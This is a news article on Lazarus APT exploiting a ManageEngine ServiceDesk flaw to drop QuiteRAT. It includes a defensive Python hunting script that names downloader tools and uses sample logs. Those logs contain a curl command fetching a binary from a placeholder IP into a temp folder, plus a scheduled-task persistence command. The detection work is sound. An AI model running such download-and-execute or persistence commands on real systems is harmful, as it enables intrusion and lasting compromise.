Lazarus APT exploits ManageEngine to launch QuiteRAT

August 31, 2023
Tags: Lazarus APT, North Korean Hackers, ManageEngine ServiceDesk, QuiteRAT, Malware

The notorious North Korean state-sponsored threat group Lazarus APT has launched a new campaign targeting internet service providers and healthcare organisations in Europe and the United States.

Based on reports, this advanced persistent threat group began its attacks as early as January by exploiting a critical vulnerability in ManageEngine ServiceDesk. The flaw in question is CVE-2022-47966.


The Lazarus APT group used the vulnerability as an entry point to its targets.


According to investigations, the Lazarus APT group used the above flaw to establish initial access to its targets. Successful exploitation led to the immediate download and execution of a malicious binary through the Java runtime process, which is how the attackers launched the implant on the compromised servers.

The binary represents a modified variant of Lazarus’ MagicRAT malware called QuiteRAT. Additionally, the group has included a new malware dubbed CollectionRAT in this campaign. The new remote access trojan could execute arbitrary commands on an infected system.

Furthermore, separate research claimed a connection between EarlyRAT and CollectionRAT; EarlyRAT is malware previously linked to Andariel, an APT faction that operates as one of the subgroups of Lazarus.

Like MagicRAT, QuiteRAT was built with the Qt framework, an open-source, cross-platform application development framework. The implant includes features such as arbitrary command execution.

Researchers noticed that its file size is smaller, ranging from only 4 to 5 MB, whereas its predecessor MagicRAT weighs in at 18 MB. The researchers attribute the smaller footprint to Lazarus bundling only the essential Qt libraries into QuiteRAT.

Furthermore, QuiteRAT has no built-in persistence mechanism; it relies on the command-and-control server to issue persistence instructions, whereas MagicRAT establishes persistence on its own by configuring scheduled tasks.
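The exploitation chain described above (a binary fetched and run through the ServiceDesk Java runtime process) and the persistence contrast just described (QuiteRAT waits for C2 instructions, MagicRAT configures scheduled tasks) both leave process-lineage traces that a SOC can hunt for. The following Python script is an added example, not code from the article or from the researchers it cites. It parses constructed, pipe-delimited process-creation records (the record format, file paths, PIDs and the 198.51.100.7 documentation address are all assumptions) and flags three behaviours: a Java process spawning a shell or downloader, a Java-descended process executing from a temp directory, and a scheduled-task creation anywhere in that lineage.

```python
"""Hunting heuristic for a Java-hosted application (such as ManageEngine
ServiceDesk) spawning downloaders, dropping binaries and creating scheduled
tasks. Added illustration; log format and paths are assumptions."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Images of the Java runtime that hosts the web application (assumption).
JAVA_IMAGES = {"java.exe", "javaw.exe", "java"}
# Shells and download helpers that a web-facing Java process rarely needs.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe",
                       "certutil.exe", "bitsadmin.exe", "wscript.exe", "mshta.exe"}
# Path fragments indicating execution from a temporary directory.
TEMP_DIR_MARKERS = ("\\temp\\", "\\tmp\\", "/tmp/")


@dataclass
class Event:
    ts: str
    pid: int
    ppid: int
    image: str
    parent_image: str
    cmdline: str


def parse_line(line: str) -> Event:
    """Parse one constructed record: ts|pid|ppid|image|parent_image|cmdline."""
    ts, pid, ppid, image, parent, cmd = line.split("|", 5)
    return Event(ts, int(pid), int(ppid), image, parent, cmd)


def basename(path: str) -> str:
    """Lower-cased file name, tolerating both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def hunt(lines: List[str]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) findings for every record in a Java lineage.

    Records must be in chronological order so that parents are seen before
    their children; only processes descending from a Java image are examined.
    """
    findings: List[Tuple[str, int]] = []
    java_lineage = set()  # PIDs whose ancestry includes a Java process
    for raw in lines:
        if not raw.strip():
            continue
        e = parse_line(raw)
        parent = basename(e.parent_image)
        child = basename(e.image)
        if parent in JAVA_IMAGES or e.ppid in java_lineage:
            java_lineage.add(e.pid)
        else:
            continue  # unrelated to the Java-hosted application
        if parent in JAVA_IMAGES and child in SUSPICIOUS_CHILDREN:
            findings.append(("java_spawns_shell_or_downloader", e.pid))
        if any(m in e.image.lower() for m in TEMP_DIR_MARKERS):
            findings.append(("java_lineage_executes_from_temp", e.pid))
        if child == "schtasks.exe" and "/create" in e.cmdline.lower():
            findings.append(("scheduled_task_from_java_lineage", e.pid))
    return findings


# Constructed sample telemetry (not real IoCs): one Java-rooted chain plus two
# unrelated events that must not be flagged.
SAMPLE_LOG = [
    r"2023-01-12T03:14:07Z|4120|812|C:\ManageEngine\ServiceDesk\jre\bin\java.exe|C:\Windows\System32\services.exe|java.exe -jar servicedesk.jar",
    r"2023-01-12T03:15:02Z|5210|4120|C:\Windows\System32\cmd.exe|C:\ManageEngine\ServiceDesk\jre\bin\java.exe|cmd.exe /c curl.exe -o C:\Windows\Temp\upd.bin http://198.51.100.7/upd.bin",
    r"2023-01-12T03:15:03Z|5222|5210|C:\Windows\Temp\upd.bin|C:\Windows\System32\cmd.exe|C:\Windows\Temp\upd.bin",
    r"2023-01-12T03:20:41Z|5300|5222|C:\Windows\System32\schtasks.exe|C:\Windows\Temp\upd.bin|schtasks.exe /create /tn Updater /tr C:\Windows\Temp\upd.bin /sc onlogon",
    r"2023-01-12T03:21:00Z|6001|1500|C:\Windows\System32\cmd.exe|C:\Windows\explorer.exe|cmd.exe",
    r"2023-01-12T03:22:00Z|6010|900|C:\Windows\System32\schtasks.exe|C:\Windows\System32\svchost.exe|schtasks.exe /create /tn Maint /tr C:\Tools\maint.exe /sc daily",
]

if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_LOG):
        print(f"{rule}: pid {pid}")
```

The lineage tracking is what separates a noisy rule from a useful one: a scheduled-task creation by itself is routine, but one whose ancestry runs back to the application server's Java process is exactly the trace the MagicRAT-style persistence would leave, while QuiteRAT's reliance on C2 instructions means the download-and-execute step from the Java process is the earliest and most reliable signal.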

Analysts claimed this is the third confirmed campaign attributed to the Lazarus group this year. This North Korean-backed APT group has consistently reused the same infrastructure across its operations.

Cybersecurity teams should track and study this threat to develop prevention tactics against the newly discovered QuiteRAT.
